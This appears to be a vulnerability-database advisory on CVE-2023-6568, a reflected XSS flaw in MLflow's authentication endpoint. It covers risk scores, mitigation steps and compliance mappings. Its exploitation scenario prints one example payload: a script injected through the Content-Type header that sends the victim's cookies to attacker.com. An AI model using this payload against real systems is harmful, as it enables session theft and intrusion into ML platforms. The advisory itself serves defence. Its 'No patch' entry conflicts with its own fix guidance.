CVE-2023-6568 — MEDIUM (CVSS 6.1) AI Security Vulnerability

CISO Take

Patch MLflow immediately if your MLOps team runs it with authentication enabled — an unauthenticated attacker can steal session tokens from data scientists and ML engineers by sending a single crafted link. Successful exploitation grants access to training pipelines, model artifacts, and experiment data, with potential pivot to connected cloud infrastructure. Network-restrict MLflow to internal networks or VPN if patching is delayed.

Risk Assessment

CVSS 6.1 understates operational risk in ML environments. The attack requires no authentication and has low complexity — only victim interaction separates an attacker from ML platform access. The Changed scope in the CVSS vector signals cross-boundary impact. Risk is significantly elevated where MLflow is internet-exposed, where ML engineers hold broad data or cloud IAM permissions, or where MLflow credentials are shared/reused across systems.

Affected Systems

Package	Ecosystem	Vulnerable Range	Patched
mlflow	pip	—	No patch
25.7K OpenSSF 4.5 624 dependents Pushed 7d ago 24% patched ~64d to patch Full package profile →

Do you use mlflow? You're affected.

Severity & Risk

CVSS 3.1

6.1 / 10

EPSS

33.4%

chance of exploitation in 30 days

Higher than 97% of all CVEs

Source: EPSS v3 — FIRST.org

Exploitation Status

Exploit Available

Exploitation: MEDIUM

Sophistication

Trivial

Exploitation Confidence

medium

○ Public PoC indexed (trickest/cve)

○ Nuclei detection template available

○ EPSS exploit prediction: 33%

Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Attack Surface

AV Network

AC Low

PR None

UI Required

S Changed

C Low

I Low

A None

Recommended Action

5 steps

Patch: Upgrade to a MLflow version including commit 28ff3f94 or later — verify via pip show mlflow and compare against the GitHub advisory.
Network isolation: Restrict MLflow UI and API to internal networks or VPN; remove any public internet exposure immediately.
Detection: Alert on requests to the MLflow auth endpoint with non-standard or anomalously long Content-Type headers.
Credential rotation: Rotate all MLflow service account tokens and user credentials post-patch.
CSP enforcement: Validate that Content-Security-Policy headers are configured on MLflow to reduce XSS impact depth.

Classification

Auth Bypass Data Extraction Framework AML.T0011.003 - Malicious Link AML.T0025 - Exfiltration via Cyber Means AML.T0049 - Exploit Public-Facing Application AML.T0106 - Exploitation for Credential Access

Compliance Impact

This CVE is relevant to:

EU AI Act

Art. 15 - Accuracy, robustness and cybersecurity

ISO 42001

A.8.4 - Security of AI system development environment

NIST AI RMF

MANAGE 2.4 - Residual risks to AI system operation are mapped and managed

OWASP LLM Top 10

LLM05 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is CVE-2023-6568?

Patch MLflow immediately if your MLOps team runs it with authentication enabled — an unauthenticated attacker can steal session tokens from data scientists and ML engineers by sending a single crafted link. Successful exploitation grants access to training pipelines, model artifacts, and experiment data, with potential pivot to connected cloud infrastructure. Network-restrict MLflow to internal networks or VPN if patching is delayed.

Is CVE-2023-6568 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2023-6568, increasing the risk of exploitation.

How to fix CVE-2023-6568?

1. Patch: Upgrade to a MLflow version including commit 28ff3f94 or later — verify via `pip show mlflow` and compare against the GitHub advisory. 2. Network isolation: Restrict MLflow UI and API to internal networks or VPN; remove any public internet exposure immediately. 3. Detection: Alert on requests to the MLflow auth endpoint with non-standard or anomalously long Content-Type headers. 4. Credential rotation: Rotate all MLflow service account tokens and user credentials post-patch. 5. CSP enforcement: Validate that Content-Security-Policy headers are configured on MLflow to reduce XSS impact depth.

What systems are affected by CVE-2023-6568?

This vulnerability affects the following AI/ML architecture patterns: MLOps platforms, model serving, training pipelines, experiment tracking.

What is the CVSS score for CVE-2023-6568?

CVE-2023-6568 has a CVSS v3.1 base score of 6.1 (MEDIUM). The EPSS exploitation probability is 33.35%.

Technical Details

NVD Description

A reflected Cross-Site Scripting (XSS) vulnerability exists in the mlflow/mlflow repository, specifically within the handling of the Content-Type header in POST requests. An attacker can inject malicious JavaScript code into the Content-Type header, which is then improperly reflected back to the user without adequate sanitization or escaping, leading to arbitrary JavaScript execution in the context of the victim's browser. The vulnerability is present in the mlflow/server/auth/__init__.py file, where the user-supplied Content-Type header is directly injected into a Python formatted string and returned to the user, facilitating the XSS attack.

Exploitation Scenario

An attacker targeting an ML team discovers their MLflow instance via Shodan or internal recon. They craft a POST request URL to the MLflow auth endpoint embedding JavaScript in the Content-Type header — e.g., `text/html;<script>fetch('https://attacker.com/?c='+encodeURIComponent(document.cookie))</script>`. The attacker sends a phishing email to a data scientist with a link triggering this request. When the victim clicks, MLflow reflects the malicious Content-Type back unescaped, the script executes in the victim's browser, and their session token is silently exfiltrated. The attacker uses the stolen token to download production model artifacts, inspect training data references, or pivot to connected cloud storage buckets using credentials stored in MLflow's artifact backend configuration.